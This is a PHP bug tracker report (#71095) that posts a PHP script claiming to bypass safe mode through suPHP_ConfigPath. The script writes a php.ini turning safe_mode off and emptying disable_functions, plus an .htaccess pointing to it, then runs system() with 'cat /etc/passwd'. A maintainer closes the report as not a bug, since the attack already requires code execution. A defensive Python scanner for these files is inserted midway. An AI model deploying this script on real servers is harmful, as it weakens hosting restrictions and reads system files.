Bug #71095 Vulnerability Bypassing Safe Mode with Exploit in apache 1.x And 2.x
Submitted: 2015-12-11 14:55 UTC
Modified: 2015-12-11 15:53 UTC
From: soufiane dot boussali at efet dot ac dot ma
Assigned:
Status: Not a bug
Package: *General Issues
PHP Version: 7.0.1RC1
OS: multiple
Private report: No
CVE-ID: None
 [2015-12-11 14:55 UTC] soufiane dot boussali at efet dot ac dot ma
Description:
------------
apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit

<?php
/*
apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit
Author   : Soufiane Boussali
Facebook : fb.com/soufian.ckin2u
*/

echo "[+] Start...\n";

// Create (or truncate) php.ini and .htaccess in the current directory
$bypfile = fopen("php.ini", "w+");
$stuffile = fopen(".htaccess", "w+");
if ($bypfile and $stuffile != NULL) {
    echo "[+] evil files created succes ! \n";
} else {
    echo "[-] access denial ! \n";
}

// php.ini contents: safe_mode off and disable_functions set to NONE
$byprullz1 = "safe_mode          =       OFF\n\n";
$byprullz2 = "disable_functions       =            NONE";
$dj = fwrite($bypfile, $byprullz1);
$dj1 = fwrite($bypfile, $byprullz2);
fclose($bypfile);
if ($dj and $dj1 != NULL) {
    echo "[+] php.ini writed \n";
} else {
    echo "[-] 404 php.ini not found !\n";
}

// .htaccess contents: point suPHP at the php.ini written above
$breakrullz = "suPHP_ConfigPath /home/user/public_html/php.ini"; // replace /home/user/public_html with your path

$sf7 = fwrite($stuffile, $breakrullz);
fclose($stuffile);
if ($sf7 != NULL) {
    echo "[+] evil .htaccess writed\n";
    echo "[+] exploited by success!\n\n\n";
    echo "\t\t\t[+] discouvred by Hacker404\n";
    echo "\t\t\t[+] hackerone.com/hacker404\n";
    echo "\t\t\t[+] Facebook : fb.com/soufian.ckin2u\n";
} else {
    echo "[-] evil .htaccess Not found!\n";
}

// Run shell commands through system() as a final check
system("pwd;ls -lia;uname -a;cat /etc/passwd");

#EOF
?>

Risk: high level

Soufiane Boussali

Best Regards,
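
A defender-side check, added here as an example and not part of the original report: it walks a document root looking for the two files the script above writes, a .htaccess carrying suPHP_ConfigPath and a php.ini that switches safe_mode off or empties disable_functions. The function names, the regular expressions and the temporary sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Directive the report's script writes into .htaccess (commented-out lines do not match)
CONFIGPATH_RE = re.compile(r'^[ \t]*suPHP_ConfigPath[ \t]+(\S+)', re.I | re.M)
# Settings the report's script writes into php.ini: safe_mode off, disable_functions empty/NONE
WEAK_INI_RE = re.compile(
    r'^[ \t]*(?:safe_mode[ \t]*=[ \t]*(?:off|0)'
    r'|disable_functions[ \t]*=[ \t]*(?:none)?)[ \t]*$', re.I | re.M)

def scan(docroot):
    """Return sorted (path, reason) findings for files under docroot."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):  # does not follow symlinks
        for name in files:
            if name not in ('.htaccess', 'php.ini'):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors='replace') as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if name == '.htaccess':
                for m in CONFIGPATH_RE.finditer(text):
                    findings.append((path, 'suPHP_ConfigPath -> ' + m.group(1)))
            elif WEAK_INI_RE.search(text):
                findings.append((path, 'php.ini relaxes safe_mode/disable_functions'))
    return sorted(findings)

def demo():
    """Build a constructed docroot holding the report's two files, then scan it."""
    root = tempfile.mkdtemp()
    site = os.path.join(root, 'public_html')
    os.makedirs(site)
    with open(os.path.join(site, 'php.ini'), 'w') as fh:
        fh.write('safe_mode          =       OFF\n\ndisable_functions       =            NONE')
    with open(os.path.join(site, '.htaccess'), 'w') as fh:
        fh.write('suPHP_ConfigPath /home/user/public_html/php.ini')
    with open(os.path.join(root, '.htaccess'), 'w') as fh:
        fh.write('Options -Indexes\n# suPHP_ConfigPath /tmp\n')  # benign control file
    return [(os.path.relpath(p, root), reason) for p, reason in scan(root)]

if __name__ == '__main__':
    for path, reason in demo():
        print(path, '|', reason)
```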


 [2015-12-11 15:53 UTC] requinix@php.net
-Status: Open +Status: Not a bug -Package: PHP Language Specification +Package: *General Issues
 [2015-12-11 15:53 UTC] requinix@php.net
So you're saying that if somebody can execute arbitrary code on your server then they can do all sorts of bad things? NO WAY!
 
Last updated: Sat May 04 22:01:33 2024 UTC